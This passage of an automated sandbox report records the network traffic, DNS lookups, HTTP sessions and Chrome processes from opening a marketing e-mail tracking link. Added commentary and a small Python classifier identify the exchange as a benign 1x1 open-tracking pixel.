            Oct 23, 2024 20:25:20.708815098 CEST | 49716 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:25:20.710566044 CEST | 49716 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:25:20.710587025 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:20.710983992 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:20.712982893 CEST | 49716 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:25:20.759341955 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:20.964159012 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:20.964195967 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:20.964226961 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:20.964310884 CEST | 49716 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:25:20.964385986 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:20.964427948 CEST | 49716 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:25:20.964449883 CEST | 49716 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:25:20.989515066 CEST | 49697 | 80 | 192.168.2.16 | 199.232.210.172
            Oct 23, 2024 20:25:20.989609957 CEST | 49698 | 80 | 192.168.2.16 | 199.232.210.172
            Oct 23, 2024 20:25:20.996105909 CEST | 80 | 49697 | 199.232.210.172 | 192.168.2.16
            Oct 23, 2024 20:25:20.996190071 CEST | 49697 | 80 | 192.168.2.16 | 199.232.210.172
            Oct 23, 2024 20:25:20.996196032 CEST | 80 | 49698 | 199.232.210.172 | 192.168.2.16
            Oct 23, 2024 20:25:20.996246099 CEST | 49698 | 80 | 192.168.2.16 | 199.232.210.172
            Oct 23, 2024 20:25:21.080699921 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:21.080786943 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:21.080872059 CEST | 49716 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:25:21.080913067 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:21.080935001 CEST | 49716 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:25:21.080939054 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:21.080992937 CEST | 49716 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:25:21.081142902 CEST | 49716 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:25:21.081176043 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:21.081198931 CEST | 49716 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:25:21.081207037 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:39.622951984 CEST | 49718 | 443 | 192.168.2.16 | 216.58.212.132
            Oct 23, 2024 20:25:39.622999907 CEST | 443 | 49718 | 216.58.212.132 | 192.168.2.16
            Oct 23, 2024 20:25:39.623106956 CEST | 49718 | 443 | 192.168.2.16 | 216.58.212.132
            Oct 23, 2024 20:25:39.623521090 CEST | 49718 | 443 | 192.168.2.16 | 216.58.212.132
            Oct 23, 2024 20:25:39.623538971 CEST | 443 | 49718 | 216.58.212.132 | 192.168.2.16
            Oct 23, 2024 20:25:40.479877949 CEST | 443 | 49718 | 216.58.212.132 | 192.168.2.16
            Oct 23, 2024 20:25:40.480268955 CEST | 49718 | 443 | 192.168.2.16 | 216.58.212.132
            Oct 23, 2024 20:25:40.480302095 CEST | 443 | 49718 | 216.58.212.132 | 192.168.2.16
            Oct 23, 2024 20:25:40.481389999 CEST | 443 | 49718 | 216.58.212.132 | 192.168.2.16
            Oct 23, 2024 20:25:40.481755018 CEST | 49718 | 443 | 192.168.2.16 | 216.58.212.132
            Oct 23, 2024 20:25:40.481930971 CEST | 443 | 49718 | 216.58.212.132 | 192.168.2.16
            Oct 23, 2024 20:25:40.523438931 CEST | 49718 | 443 | 192.168.2.16 | 216.58.212.132
            Oct 23, 2024 20:25:50.484721899 CEST | 443 | 49718 | 216.58.212.132 | 192.168.2.16
            Oct 23, 2024 20:25:50.484863997 CEST | 443 | 49718 | 216.58.212.132 | 192.168.2.16
            Oct 23, 2024 20:25:50.485250950 CEST | 49718 | 443 | 192.168.2.16 | 216.58.212.132
            Oct 23, 2024 20:25:50.981245995 CEST | 49718 | 443 | 192.168.2.16 | 216.58.212.132
            Oct 23, 2024 20:25:50.981323957 CEST | 443 | 49718 | 216.58.212.132 | 192.168.2.16
            Oct 23, 2024 20:26:10.513803959 CEST | 49700 | 80 | 192.168.2.16 | 192.229.221.95
            Oct 23, 2024 20:26:10.520250082 CEST | 80 | 49700 | 192.229.221.95 | 192.168.2.16
            Oct 23, 2024 20:26:10.520355940 CEST | 49700 | 80 | 192.168.2.16 | 192.229.221.95
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Oct 23, 2024 20:24:34.714340925 CEST | 53 | 63557 | 1.1.1.1 | 192.168.2.16
            Oct 23, 2024 20:24:34.760878086 CEST | 53 | 54376 | 1.1.1.1 | 192.168.2.16
            Oct 23, 2024 20:24:35.653000116 CEST | 58439 | 53 | 192.168.2.16 | 1.1.1.1
            Oct 23, 2024 20:24:35.653194904 CEST | 63048 | 53 | 192.168.2.16 | 1.1.1.1
            Oct 23, 2024 20:24:35.679389954 CEST | 53 | 63048 | 1.1.1.1 | 192.168.2.16
            Oct 23, 2024 20:24:35.701786995 CEST | 53 | 58439 | 1.1.1.1 | 192.168.2.16
            Oct 23, 2024 20:24:35.984704018 CEST | 53 | 57513 | 1.1.1.1 | 192.168.2.16
            Oct 23, 2024 20:24:39.562072992 CEST | 49797 | 53 | 192.168.2.16 | 1.1.1.1
            Oct 23, 2024 20:24:39.562230110 CEST | 53531 | 53 | 192.168.2.16 | 1.1.1.1
            Oct 23, 2024 20:24:39.569964886 CEST | 53 | 49797 | 1.1.1.1 | 192.168.2.16
            Oct 23, 2024 20:24:39.570099115 CEST | 53 | 53531 | 1.1.1.1 | 192.168.2.16
            Oct 23, 2024 20:24:53.034940004 CEST | 53 | 61870 | 1.1.1.1 | 192.168.2.16
            Oct 23, 2024 20:25:11.855343103 CEST | 53 | 52642 | 1.1.1.1 | 192.168.2.16
            Oct 23, 2024 20:25:34.603399038 CEST | 53 | 62094 | 1.1.1.1 | 192.168.2.16
            Oct 23, 2024 20:25:34.716120005 CEST | 53 | 50825 | 1.1.1.1 | 192.168.2.16
            Oct 23, 2024 20:25:35.961344957 CEST | 138 | 138 | 192.168.2.16 | 192.168.2.255
            Oct 23, 2024 20:25:39.613648891 CEST | 62825 | 53 | 192.168.2.16 | 1.1.1.1
            Oct 23, 2024 20:25:39.613934040 CEST | 63174 | 53 | 192.168.2.16 | 1.1.1.1
            Oct 23, 2024 20:25:39.621705055 CEST | 53 | 62825 | 1.1.1.1 | 192.168.2.16
            Oct 23, 2024 20:25:39.622015953 CEST | 53 | 63174 | 1.1.1.1 | 192.168.2.16
            Oct 23, 2024 20:26:02.757611990 CEST | 53 | 54496 | 1.1.1.1 | 192.168.2.16
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Oct 23, 2024 20:24:35.653000116 CEST | 192.168.2.16 | 1.1.1.1 | 0xe37 | Standard query (0) | click.email.traininng.com | A (IP address) | IN (0x0001) | false
            Oct 23, 2024 20:24:35.653194904 CEST | 192.168.2.16 | 1.1.1.1 | 0x8afe | Standard query (0) | click.email.traininng.com | 65 | IN (0x0001) | false
            Oct 23, 2024 20:24:39.562072992 CEST | 192.168.2.16 | 1.1.1.1 | 0x6ed7 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
            Oct 23, 2024 20:24:39.562230110 CEST | 192.168.2.16 | 1.1.1.1 | 0xb417 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
            Oct 23, 2024 20:25:39.613648891 CEST | 192.168.2.16 | 1.1.1.1 | 0x5948 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
            Oct 23, 2024 20:25:39.613934040 CEST | 192.168.2.16 | 1.1.1.1 | 0x83f0 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Oct 23, 2024 20:24:35.679389954 CEST | 1.1.1.1 | 192.168.2.16 | 0x8afe | No error (0) | click.email.traininng.com | click.virt.s11.exacttarget.com | | CNAME (Canonical name) | IN (0x0001) | false
            Oct 23, 2024 20:24:35.701786995 CEST | 1.1.1.1 | 192.168.2.16 | 0xe37 | No error (0) | click.email.traininng.com | click.virt.s11.exacttarget.com | | CNAME (Canonical name) | IN (0x0001) | false
            Oct 23, 2024 20:24:35.701786995 CEST | 1.1.1.1 | 192.168.2.16 | 0xe37 | No error (0) | click.virt.s11.exacttarget.com | | 13.111.71.11 | A (IP address) | IN (0x0001) | false
            Oct 23, 2024 20:24:39.569964886 CEST | 1.1.1.1 | 192.168.2.16 | 0x6ed7 | No error (0) | www.google.com | | 142.250.186.36 | A (IP address) | IN (0x0001) | false
            Oct 23, 2024 20:24:39.570099115 CEST | 1.1.1.1 | 192.168.2.16 | 0xb417 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
            Oct 23, 2024 20:25:39.621705055 CEST | 1.1.1.1 | 192.168.2.16 | 0x5948 | No error (0) | www.google.com | | 216.58.212.132 | A (IP address) | IN (0x0001) | false
            Oct 23, 2024 20:25:39.622015953 CEST | 1.1.1.1 | 192.168.2.16 | 0x83f0 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
            • fs.microsoft.com
            • slscr.update.microsoft.com
            • click.email.traininng.com
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.16 | 49709 | 13.111.71.11 | 80 | 6836 | C:\Program Files\Google\Chrome\Application\chrome.exe
            Timestamp | Bytes transferred | Direction | Data
            Oct 23, 2024 20:24:35.708239079 CEST | 574 | OUT | GET /open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0 HTTP/1.1
            Host: click.email.traininng.com
            Connection: keep-alive
            Upgrade-Insecure-Requests: 1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Oct 23, 2024 20:24:36.378110886 CEST | 199 | IN | HTTP/1.1 200 OK
            Cache-Control: no-cache; max-age=0
            Content-Type: image/gif
            Date: Wed, 23 Oct 2024 18:24:35 GMT
            Connection: close
            Content-Length: 43
            Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
            Data Ascii: GIF89a!,D;
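            The exchange in session 0 is the signature of an e-mail open-tracking beacon: a GET to open.aspx carrying a long opaque recipient identifier, answered with a 43-byte 1x1 GIF and Cache-Control: no-cache so that every render of the mail re-fetches it. The report's verdict (score 0) is consistent with that; the only thing the pixel does is tell the sender that the message was opened. The following Python is an added example, not code from the Joe Sandbox report or from Joe Security: it parses the GIF header from the captured body bytes above and scores the request/response pair against those hallmarks. The request line, response headers and body bytes are copied from session 0; the helper names, the 40-character identifier threshold and the "three hallmarks" cut-off are our own assumptions.

```python
"""Classify a captured HTTP exchange as an e-mail open-tracking pixel.

Added example; not code from the Joe Sandbox report or from Joe Security.
The request line, response headers and the 43 body bytes are copied from
session 0 of the report. Function names and thresholds are assumptions.
"""
import hashlib
import struct
from urllib.parse import parse_qsl, urlsplit

# Response body of session 0, copied from the report's "Data Raw" line.
PIXEL_BODY = bytes.fromhex(
    "47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00"
    " 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b"
)

# Request line and the headers that matter, copied from session 0.
REQUEST_LINE = (
    "GET /open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673"
    "-fe301171716404787d1272-ff69107174-fe4115757565067d741474"
    "-ff051573756402&bmt=0 HTTP/1.1"
)
REQUEST_HEADERS = {"Host": "click.email.traininng.com"}
RESPONSE_HEADERS = {
    "Cache-Control": "no-cache; max-age=0",
    "Content-Type": "image/gif",
    "Connection": "close",
    "Content-Length": "43",
}

# MD5 the report lists for the dropped 1x1 GIF (the canonical transparent
# pixel that most tracking services serve).
KNOWN_PIXEL_MD5 = "325472601571f31e1bf00674c368d335"


def parse_gif_header(data: bytes) -> dict:
    """Parse the GIF signature and logical screen descriptor (first 13 bytes).

    Raises ValueError if the bytes are not a GIF87a/GIF89a stream.
    """
    if len(data) < 13 or data[:3] != b"GIF" or data[3:6] not in (b"87a", b"89a"):
        raise ValueError("not a GIF stream")
    # Width and height are little-endian u16; the packed byte's top bit says
    # a global colour table follows, its low 3 bits give that table's size.
    width, height, packed = struct.unpack("<HHB", data[6:11])
    return {
        "version": data[3:6].decode("ascii"),
        "width": width,
        "height": height,
        "has_global_color_table": bool(packed & 0x80),
        "global_color_table_size": 2 ** ((packed & 0x07) + 1),
    }


def classify_beacon(request_line: str, request_headers: dict,
                    response_headers: dict, body: bytes) -> dict:
    """Score one HTTP exchange for the hallmarks of an open-tracking pixel.

    The hallmarks are heuristics, not a standard: an invisible image, an
    opaque per-recipient identifier in the URL, caching disabled so every
    render re-fetches the pixel, and the well-known transparent GIF body.
    """
    reasons = []
    method, target, _ = request_line.split(" ", 2)
    parts = urlsplit(target)

    # 1. Body is a GIF no larger than 1x1: nothing a reader could see.
    try:
        gif = parse_gif_header(body)
    except ValueError:
        gif = None
    if gif and gif["width"] <= 1 and gif["height"] <= 1:
        reasons.append(f"{gif['width']}x{gif['height']} GIF body")

    # 2. Served as an image with caching disabled.
    ctype = response_headers.get("Content-Type", "").lower()
    cache = response_headers.get("Cache-Control", "").lower()
    if ctype.startswith("image/") and ("no-cache" in cache or "no-store" in cache):
        reasons.append("image served with caching disabled")

    # 3. An opaque identifier in the query string. Assumption: a bare key of
    #    40+ characters with no value, the shape of the report's open.aspx URL.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if len(key) >= 40 and value == "":
            reasons.append(f"opaque tracking id ({len(key)} chars)")
            break

    # 4. Exact match against the canonical transparent GIF.
    md5 = hashlib.md5(body).hexdigest()
    if md5 == KNOWN_PIXEL_MD5:
        reasons.append("body is the canonical 1x1 transparent GIF")

    return {
        "method": method,
        "host": request_headers.get("Host", ""),
        "path": parts.path,
        "md5": md5,
        "gif": gif,
        "reasons": reasons,
        # Assumed cut-off: three or more hallmarks -> open-tracking pixel.
        "is_tracking_pixel": len(reasons) >= 3,
    }


if __name__ == "__main__":
    verdict = classify_beacon(REQUEST_LINE, REQUEST_HEADERS, RESPONSE_HEADERS, PIXEL_BODY)
    print(verdict["host"] + verdict["path"], verdict["is_tracking_pixel"], verdict["reasons"])
```

            Run against session 1 (the favicon request that returned a 404 HTML page) the same function reports no hallmarks, which is the distinction an analyst wants: the beacon is benign in the malware sense, but it is still a signal to whoever operates click.email.traininng.com that the mailbox is live.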


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.16 | 49710 | 13.111.71.11 | 80 | 6836 | C:\Program Files\Google\Chrome\Application\chrome.exe
            Timestamp | Bytes transferred | Direction | Data
            Oct 23, 2024 20:24:36.485855103 CEST | 528 | OUT | GET /favicon.ico HTTP/1.1
            Host: click.email.traininng.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Referer: http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Oct 23, 2024 20:24:36.648236990 CEST | 1236 | IN | HTTP/1.1 404 Not Found
            Content-Type: text/html
            Date: Wed, 23 Oct 2024 18:24:36 GMT
            Connection: close
            Content-Length: 1245
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
            Oct 23, 2024 20:24:36.648472071 CEST | 138 | IN | Data Raw: 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62
            Data Ascii: ing for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.16 | 49712 | 184.28.90.27 | 443 | |
            Timestamp | Bytes transferred | Direction | Data
            2024-10-23 18:24:38 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Encoding: identity
            User-Agent: Microsoft BITS/7.8
            Host: fs.microsoft.com
            2024-10-23 18:24:38 UTC | 466 | IN | HTTP/1.1 200 OK
            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
            Content-Type: application/octet-stream
            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
            Server: ECAcc (lpl/EF06)
            X-CID: 11
            X-Ms-ApiVersion: Distribute 1.2
            X-Ms-Region: prod-neu-z1
            Cache-Control: public, max-age=80494
            Date: Wed, 23 Oct 2024 18:24:38 GMT
            Connection: close
            X-CID: 2


            Session ID  Source IP     Source Port  Destination IP  Destination Port  PID  Process
            1           192.168.2.16  49713        184.28.90.27    443
            Timestamp                Bytes transferred  Direction  Data
            2024-10-23 18:24:39 UTC  239                OUT        GET /fs/windows/config.json HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Encoding: identity
            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
            Range: bytes=0-2147483646
            User-Agent: Microsoft BITS/7.8
            Host: fs.microsoft.com
            2024-10-23 18:24:40 UTC  514                IN         HTTP/1.1 200 OK
            ApiVersion: Distribute 1.1
            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
            Content-Type: application/octet-stream
            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
            Server: ECAcc (lpl/EF06)
            X-CID: 11
            X-Ms-ApiVersion: Distribute 1.2
            X-Ms-Region: prod-weu-z1
            Cache-Control: public, max-age=80462
            Date: Wed, 23 Oct 2024 18:24:39 GMT
            Content-Length: 55
            Connection: close
            X-CID: 2
            2024-10-23 18:24:40 UTC  55                 IN         Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


            Session ID  Source IP     Source Port  Destination IP   Destination Port  PID  Process
            2           192.168.2.16  49715        172.202.163.200  443
            Timestamp                Bytes transferred  Direction  Data
            2024-10-23 18:24:43 UTC  306                OUT        GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UXhVePttZLeKToH&MD=ab1o2xFG HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
            Host: slscr.update.microsoft.com
            2024-10-23 18:24:43 UTC  560                IN         HTTP/1.1 200 OK
            Cache-Control: no-cache
            Pragma: no-cache
            Content-Type: application/octet-stream
            Expires: -1
            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
            MS-CorrelationId: f74448c1-64d9-4fa0-8224-fdc4f0e883db
            MS-RequestId: 6b7aa0c2-0707-490d-8019-446dd92cfe77
            MS-CV: 7c8aTxAQzEquqv3i.0
            X-Microsoft-SLSClientCache: 2880
            Content-Disposition: attachment; filename=environment.cab
            X-Content-Type-Options: nosniff
            Date: Wed, 23 Oct 2024 18:24:43 GMT
            Connection: close
            Content-Length: 24490
            2024-10-23 18:24:43 UTC  15824              IN         Data Raw: (binary environment.cab body, hex dump omitted)
            2024-10-23 18:24:43 UTC  8666               IN         Data Raw: (binary environment.cab body, hex dump omitted)


            Session ID  Source IP     Source Port  Destination IP   Destination Port  PID  Process
            3           192.168.2.16  49716        172.202.163.200  443
            Timestamp                Bytes transferred  Direction  Data
            2024-10-23 18:25:20 UTC  306                OUT        GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UXhVePttZLeKToH&MD=ab1o2xFG HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
            Host: slscr.update.microsoft.com
            2024-10-23 18:25:20 UTC  560                IN         HTTP/1.1 200 OK
            Cache-Control: no-cache
            Pragma: no-cache
            Content-Type: application/octet-stream
            Expires: -1
            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
            MS-CorrelationId: 76784dfd-c216-4bee-b453-29f5bfac4554
            MS-RequestId: 52bd8393-818a-4bc8-bbf2-fb2cab979cc5
            MS-CV: jDBiA6dXm0W80Byd.0
            X-Microsoft-SLSClientCache: 1440
            Content-Disposition: attachment; filename=environment.cab
            X-Content-Type-Options: nosniff
            Date: Wed, 23 Oct 2024 18:25:20 GMT
            Connection: close
            Content-Length: 30005
            2024-10-23 18:25:20 UTC  15824              IN         Data Raw: (binary environment.cab body, hex dump omitted)
            2024-10-23 18:25:21 UTC  14181              IN         Data Raw: (binary environment.cab body, hex dump omitted)


            Target ID:1
            Start time:14:24:32
            Start date:23/10/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Imagebase:0x7ff7f9810000
            File size:3'242'272 bytes
            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:2
            Start time:14:24:33
            Start date:23/10/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1980,i,9027391736770792029,216551370925765132,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Imagebase:0x7ff7f9810000
            File size:3'242'272 bytes
            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:3
            Start time:14:24:34
            Start date:23/10/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0"
            Imagebase:0x7ff7f9810000
            File size:3'242'272 bytes
            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            No disassembly